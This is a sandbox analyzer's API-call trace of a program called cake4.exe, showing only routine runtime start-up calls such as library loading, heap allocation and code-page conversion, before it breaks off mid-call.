# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 04.05.2020 15:16:27.186 Process: id = "1" image_name = "cake4.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cake4.exe" page_root = "0x42c85000" os_pid = "0x360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x598 [0053.058] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x4af7e4 | out: lpSystemTimeAsFileTime=0x4af7e4*(dwLowDateTime=0x17709760, dwHighDateTime=0x1d62227)) [0053.058] GetCurrentThreadId () returned 0x598 [0053.058] GetCurrentProcessId () returned 0x360 [0053.058] QueryPerformanceCounter (in: lpPerformanceCount=0x4af7dc | out: lpPerformanceCount=0x4af7dc*=17308498386) returned 1 [0053.130] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0053.130] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0053.130] GetLastError () returned 0x57 [0053.130] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0053.130] GetLastError () returned 0x57 [0053.130] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0053.132] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0053.132] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0053.132] GetLastError () returned 0x57 [0053.132] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0053.132] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0053.132] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0053.132] GetLastError () returned 0x57 [0053.132] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x75670000 [0053.154] GetProcAddress (hModule=0x75670000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0053.165] GetProcessHeap () returned 0x6d0000 [0053.165] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0053.166] GetLastError () returned 0x57 [0053.166] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0053.177] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0053.177] GetLastError () returned 0x57 [0053.177] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0053.177] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0053.177] GetLastError () returned 0x57 [0053.177] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0053.177] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x364) returned 0x6e4a10 [0053.177] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0053.178] SetLastError (dwErrCode=0x57) [0053.178] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xc00) returned 0x6e4d80 [0053.180] GetStartupInfoW (in: lpStartupInfo=0x4af718 | out: lpStartupInfo=0x4af718*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x243dc0, hStdOutput=0x116ea615, hStdError=0xfffffffe)) [0053.180] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0053.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0053.181] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0053.181] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" " [0053.181] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" " [0053.181] GetLastError () returned 0x57 [0053.181] SetLastError (dwErrCode=0x57) [0053.181] GetLastError () returned 0x57 [0053.181] SetLastError (dwErrCode=0x57) [0053.181] GetACP () returned 0x4e4 [0053.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x220) returned 0x6e46c8 [0053.181] IsValidCodePage (CodePage=0x4e4) returned 1 [0053.181] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x4af748 | out: lpCPInfo=0x4af748) returned 1 [0053.181] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x4af010 | out: lpCPInfo=0x4af010) returned 1 [0053.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4af624, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0053.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4af624, cbMultiByte=256, lpWideCharStr=0x4aeda8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0053.181] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x4af024 | out: lpCharType=0x4af024) returned 1 [0053.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4af624, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0053.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4af624, cbMultiByte=256, lpWideCharStr=0x4aed58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0053.181] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0053.181] GetLastError () returned 0x57 [0053.181] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0053.184] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0053.184] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0053.184] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x4aeb48, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0053.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x4af524, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ­\n\x0c\x11`÷J", lpUsedDefaultChar=0x0) returned 256 [0053.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4af624, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0053.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4af624, cbMultiByte=256, lpWideCharStr=0x4aed78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0053.185] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0053.185] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x4aeb68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0053.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x4af424, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ­\n\x0c\x11`÷J", lpUsedDefaultChar=0x0) returned 256 [0053.185] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e48f0 [0053.185] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28da20, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cake4.exe")) returned 0x2f [0053.185] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x38) returned 0x6e6188 [0053.185] RtlInitializeSListHead (in: ListHead=0x28d398 | out: ListHead=0x28d398) [0053.185] GetLastError () returned 0x0 [0053.185] SetLastError (dwErrCode=0x0) [0053.185] GetEnvironmentStringsW () returned 0x6e61c8* [0053.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0053.185] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x565) returned 0x6e6ca0 [0053.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x6e6ca0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0053.186] FreeEnvironmentStringsW (penv=0x6e61c8) returned 1 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x98) returned 0x6e61c8 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1f) returned 0x6e6008 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x36) returned 0x6e6268 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x37) returned 0x6e62a8 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3c) returned 0x6e62e8 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x31) returned 0x6e6330 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x17) returned 0x6e4978 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6e6370 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x14) returned 0x6e63a0 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xd) returned 0x6def38 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x25) returned 0x6e63c0 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x39) returned 0x6e63f0 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6e6438 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x17) returned 0x6e6458 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xe) returned 0x6def50 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x69) returned 0x6e6478 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x3e) returned 0x6e64f0 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1b) returned 0x6e6030 [0053.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1d) returned 0x6e6058 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x48) returned 0x6e6538 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x12) returned 0x6e6588 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6e65a8 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1b) returned 0x6e6080 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x24) returned 0x6e65c8 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x29) returned 0x6e65f8 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1e) returned 0x6e60a8 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x41) returned 0x6e6630 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x17) returned 0x6e6680 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xf) returned 0x6def68 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x16) returned 0x6e66a0 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2a) returned 0x6e66c0 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x29) returned 0x6e66f8 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x15) returned 0x6e6730 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x1e) returned 0x6e60d0 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x2a) returned 0x6e6750 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x12) returned 0x6e6788 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6e67a8 [0053.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x46) returned 0x6e67c8 [0053.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6ca0 | out: hHeap=0x6d0000) returned 1 [0053.187] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0053.188] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0053.188] GetProcAddress 